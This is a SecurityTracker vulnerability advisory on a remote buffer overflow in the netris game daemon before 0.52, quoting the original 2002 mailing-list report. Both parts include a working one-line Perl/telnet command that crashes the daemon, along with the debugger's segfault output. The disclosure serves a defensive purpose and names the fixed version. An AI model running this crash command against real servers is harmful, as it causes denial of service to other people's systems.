SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Join our Affiliate Program
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Game)  >  netris Vendors:  Weaver, Mark H.
netris Game Buffer Overflow Lets Remote Users Crash the Daemon
SecurityTracker Alert ID:  1007544
CVE Reference:  CAN-2002-1566   (Links to External Site)
Date:  Aug 21 2003
Impact:  Denial of service via network
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
Version(s): prior to 0.52
Description:  A buffer overflow vulnerability was reported in the netris game. A remote user can cause the game to crash.

It was reported [in September 2002] that when netris is run with the '-w' command line option (i.e., the wait option), a remote user can connect to the target system on TCP port 9284 and send a long string to cause the netris daemon on the target server to crash.

A demonstration exploit command is provided:

perl -e '{print "a"x"1028"}' | telnet localhost 9284
Impact:  A remote user can cause the netris daemon to crash.
Solution:  The vendor has released a fixed version (0.52), available at:

ftp://ftp.netris.org/pub/netris/
Vendor URL:  www.netris.org/ (Links to External Site)
Cause:  Boundary error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  Artur Byszko / bajkero <bajkero@security.hack.pl>
Message History:   None.

 Source Message Contents
Date:  Mon, 9 Sep 2002 06:55:38 +0200
From:  Artur Byszko / bajkero <bajkero@security.hack.pl>
Subject:  netris-0.5.

 


--WIyZ46R2i8wDzkSu
Content-Type: text/plain; charset=iso-8859-2
Content-Disposition: inline
Content-Transfer-Encoding: 8bit            

hi.

i found remote bug in latest version of netris(0.5)..

(apocalypse:~)% gdb netris
GNU gdb 4.18 (FreeBSD)
[..]
(gdb) r -w
Starting program: /usr/local/bin/netris -w
(no debugging symbols found)...(no debugging symbols found)...


***
on second terminal:
(apocalypse:~)% perl -e '{print "a"x"1028"}' | telnet localhost 9284
***

Your opponent is using an old, incompatible version
of Netris.  They should get the latest version.
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x28138fd5 in getenv () from /usr/lib/libc.so.4


exploit code is still under developing.. ;)

sorry for my terrible english.

best regards,
-- 
* Artur Byszko * \x62\x61\x6a\x6b\x65\x72\x6f *

--WIyZ46R2i8wDzkSu
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (FreeBSD)

iD8DBQE9fCnKQCQI8Fcqp4cRApvQAJ9T1Gmcbxw5x3YEIxSZ5sgC5dwXGQCgh1fH
LXwaDWRPOQ/boJ6WDkYtNJM=
=bTns
-----END PGP SIGNATURE-----

--WIyZ46R2i8wDzkSu--


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC